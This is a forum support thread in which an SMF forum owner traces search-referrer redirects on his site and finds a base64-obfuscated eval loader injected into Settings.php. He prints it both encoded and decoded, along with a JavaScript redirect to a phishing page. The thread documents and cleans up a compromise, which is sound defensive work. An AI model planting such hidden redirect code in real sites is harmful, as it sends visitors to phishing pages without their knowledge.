News:

SMF 2.1.4 has been released! Take it for a spin! Read more.

Main Menu

problems with a Redirect Exploit on my site (mod related?)

Started by Gaming4JC, December 13, 2010, 08:46:31 PM

Previous topic - Next topic

Gaming4JC

Hey all,
I just tested this twice to confirm.  The so-called Google Tagged MOD is malicious. >:(
In order to repeat the process go to Admin >> Package Manager >>Download Packages >> Simple Machines Third-party Mod Site >> Feature Enhancements >> Google Tagged. Once it has been downloaded all you have to do to root your site is click "Install Mod".
The url is: yoursmf-site.com/index.php?action=admin;area=packages;sa=install;package=google-tagged20rc3.zip

As soon as this is clicked you should get an insane amount of security warnings including a drive-by download from AVG, a warning on WebofTrust, and an attempted browser hijack to finditnow.osa.pl/atp/?said=3333&q=facebook which is a pathetic bing.com phishing site.

First, I'd like to know if my site is truly clean after my attempted removal of the plugin and if any information has been compromised from my members.
Secondly I think this plugin should be pulled from the repo ASAP!  :o

Please feel free to test it yourself to confirm.  :-\

Edit: Also wanted to let everyone know this is the latest RC4 I'm running, which is why I classify it as a bug since it should detect malicious plugins... or at least not have them in the main repo... xP

JBlaze

I've gone and checked the package, and there is nothing malicious at all.

Are you sure you don't have a virus/spyware on your computer? I'd run an anti-virus scan as well as ask your host for access logs and previous changes before you blindly accuse a mod of being malicious.
Jason Clemons
Former Team Member 2009 - 2012

Gaming4JC

100% postive it's the plugin. I tested it on several computers including linux with noscript. There's a redirect going on there.

Sites redirect in the following order...
antispyche.bij.pl (last about 2sec and goes to one of the following)
personalsuite-checker.in   
finditnow.osa.pl
info.com

FYI, I do computer repair and malware removal as a hobbie. There's no malware on my box.  :D

JBlaze

Quote from: Gaming4JC on December 13, 2010, 09:12:25 PM
100% postive it's the plugin. I tested it on several computers including linux with noscript. There's a redirect going on there.
And I'm 100% positive it's not. I'm a former Customizer here and I've tested hundreds of mods. I've seen my share of bad packages and stuff.

Do what I said and run an anti-virus as well as talk to your host to see if there is a malicious script running on your server. IF that all comes back clean, then we can go from there.
Jason Clemons
Former Team Member 2009 - 2012

Gaming4JC

Ok then, let's assume it's not. Then it must be the repository I am downloading from has been compromised. The day Ubuntu linux gets a worm without me entering a root password I'll eat my keyboard.  ::)

JBlaze

Quote from: Gaming4JC on December 13, 2010, 09:21:28 PM
Ok then, let's assume it's not. Then it must be the repository I am downloading from has been compromised. The day Ubuntu linux gets a worm without me entering a root password I'll eat my keyboard.  ::)
The repository you are downloading from is the simplemachines.org server. If said server has been exploited in any way, it would have been taken care of already, and a notice posted. 

Best thing you can do is what I said above. And now that I think of it, you can check your SMF source and template files for a rogue <script> tag that may be linking to above phishing site. This could have been added even before you attempted to install the Google Tagged package, and only showed up on the admin template.

My point is this: don't blame a simple package that has been on the mod site for years for a possible exploit on your site. Make sure you have covered all aspects of this yourself and done your research before accusing. I've double and triple checked the package, like I always do, and there is nothing malicious about it.
Jason Clemons
Former Team Member 2009 - 2012

Gaming4JC

Well, let's put it this way. I install mod and redirect occurs, I uninstall it (only with FireFox Noscript plugin, since it's impossible to do so without it) and it goes away. This has never happened with any other mod and I have a fairly fresh SMF install.

I realize you have examined it, but have you actually tried to install it? And if you want I can set you up a temporary admin account right now on my site to prove my point. There's no malicious scripts until it has been installed. I'll go ahead and run firebug on it just for the heck of it...  :P

JBlaze

Quote from: Gaming4JC on December 13, 2010, 09:33:06 PM
I realize you have examined it, but have you actually tried to install it?
That's part of examining mod packages ;)

Quote from: Gaming4JC on December 13, 2010, 09:33:06 PM
And if you want I can set you up a temporary admin account right now on my site to prove my point.
No thanks. All I need is a link to your site, and I can run a quick source check to see if there's any malicious JS that shouldn't be there.
Jason Clemons
Former Team Member 2009 - 2012

Gaming4JC

Here you are, I left it half-way installed (on the server) so it's continually triggering the effect for anyone accessing the package manager right now.
http://forum.christiangamemaker.com

Here's a screenshot of my website getting redirected as seen on my desktop. (ahem, I can take one from win7 too if you don't like the radically modifed interface)
http://img80.imageshack.us/img80/4628/screenshot1ba.png

I'm not seeing the script on firebug, but maybe I'm missing something. NoScript recently failed to stop it as well... I can't help but think I just got an update to make their hack a little better. At least I know it's not my computer, it's affecting other accounts as well.

Edit: Finding some odd stuff using FireCookie, I might be wrong but it seems to be related to a php session cookie redirect? Still looking into it.

Gaming4JC

Minor updates, I have figured out a little bit more. It is indeed something to do with cookies and cache, though it's even more advanced than anything I care to comprehend at the moment. The redirect has several stages. Initially it points your browser to a blank page which then redirects with a typical javascript on the proceeding page.

As you can see in the photo the real web address gets a "failed" request, followed by the malicious redirect.


<SCRIPT LANGUAGE="JavaScript">
<!--
setTimeout ("changePage()", 100);
function changePage() {
if (self.parent.frames.length != 0)
self.parent.location="finditnow.osa.pl/atp/?said=3333g&q=facebook";
}
// -->
</SCRIPT>


Still not seeing how it all comes in to play... you?

Edit: I'm not going to put my users at risk anymore, though I'm hoping it's actually out. I've removed the package and changed my password. Let me know if you find anything else I should know about.

Kindred

not an SMF bug (so it does not belong in the bug reports) and not actually a problem with the mod...

I am moving this to general support and changing the title so it does not frighten people who skim the title.
Слaва
Украинi

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

Gaming4JC

Well, thanks for pointing out that's it's evidently not the mod.... however, that troubles me even more. If it's not the mod what is it, and why is it triggered by this mod specifically?

I'm still not too comfortable for my members' sake.


TeeJay

Check you .htaccess file
Not just in the root folder of your forum but in the root of your server

It's probably been hacked and a malicious redirect in you .htaccess file which is conditional on the reffering url

e.g. if you try to follow a link from Google to your site it will redirect, if you type the url in your browser it won't

Gaming4JC

TeeJay, pretty sure you are correct about one thing. It's a low level redirect using 302, 302, and then 301.
I mistakenly thought the problem was resolved, it is definitely not. I used RefControl in Firefox to spoof the referrer as a google search, the exploit happens everytime. I have also checked all other pages on my site, it doesn't occur. It occurs only in the forums sub-domain. I contacted my hosting provider which scanned the server and said there are no rogue .htaccess files they could see, and since it happens only in the forum they said it was most definitely a weakness in the forum software. They did mention that if there is a file, even though they couldn't find it, it was triggered through this web application. (everyone points finger at SMF xD )

This malware described:
http://blog.unmaskparasites.com/2008/12/08/unmasking-the-antivirus-2009-htaccess-exploit/

Malware on the site detected:
http://www.unmaskparasites.com/security-report/?page=forum.christiangamemaker.com

There has to be a .htaccess file somewhere, but I can't find it anywhere on the server. I even did a "*.htaccess" file search on ubuntus ftp crawler. Nothing out of the ordinary.  ???

I'm attempting to get help from other security sources ASAP!  :'(

Kindred

no, it doesn't have to be an .htaccess....   There is redirect code that can be inserted into the php files that will do the same thing.

And let's be clear....   the inserted code may have been done to smf files, but, until I hear otherwise, there are no known security holdes in SMF, which means that the security weakness was not actually in SMF itself.
(remember, it could be in ANY software on your web server, just because SMF was affected does not mean it was the avenue)

Look in Settings.php, index.php and your theme index.template.php files for any sort of redirect code...  especially ay base64 encoded crap...   SMF does not use base64 encoded code, so if you find any, it is suspect.

if not those files, then possibly others...

basically, to be completely safe, what you should do is, once you have verified that Settings.php is clean, save a copy to your local PC, delete the files out of your forum root, all of the files and sub-directories in your Sources directory and remove all of the Themes sub-directories.
Using the large upgrade package of SMF, re-upload the entire forum file set, then re-upload the Settings.php that you saved.

This will reset your forum to a default installation (you will not lose any messages or members, because those are in the database, not the files)

You can then re-apply mods and themes from clean, newly downloaded copies.


Yes.... this is a bother, but it is the easiest way to be certain that all of your files are clean.
Слaва
Украинi

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

Gaming4JC

Finally found the little gem, it compromised the header on Settings.php.
<?php                                         eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJG5jY3Y9aGVhZGVyc19zZW50KCk7DQppZiAoISRuY2N2KXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYXNrLmNvbSIpKSB7DQoJaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJzaXRlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9hbnRpc3B5Y2hlLmJpai5wbC8iKTsNCgkJZXhpdCgpOw0KCX0NCn0NCgl9"));

I'll be doing a complete full-upgrade as advised.

Guess I should change all my passwords? :s
Furthermore how do I know they haven't tampered in the SQL database?...

Kindred

you don't know for sure.... but there is very little they can do with the database itself (I think)

Usually, they don't bother with the db, they only care about the files.
Слaва
Украинi

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

Gaming4JC

#18
Ok, thanks. Also I think I might attempt to re-create the exploit on another server to test the plugins I was using.

Btw here's the code unmasked:
error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"ask.com")) {
if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: antispyche.bij.pl");
exit();
}
}
}

What a nasty piece of crap... xP
That explains why the host couldn't find it, it was embedded into the php itself as you said.
The file was modified December 20th, 2010.

Google also mentions it affected PHPBB2 and VBulliten.

Kindred

what mods did you have installed?
What other software are you running on the site?

If you're on a shared hosting, and they are not running properly configured partitions, someone else's account may have allowed them access to your account.
Слaва
Украинi

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

Advertisement: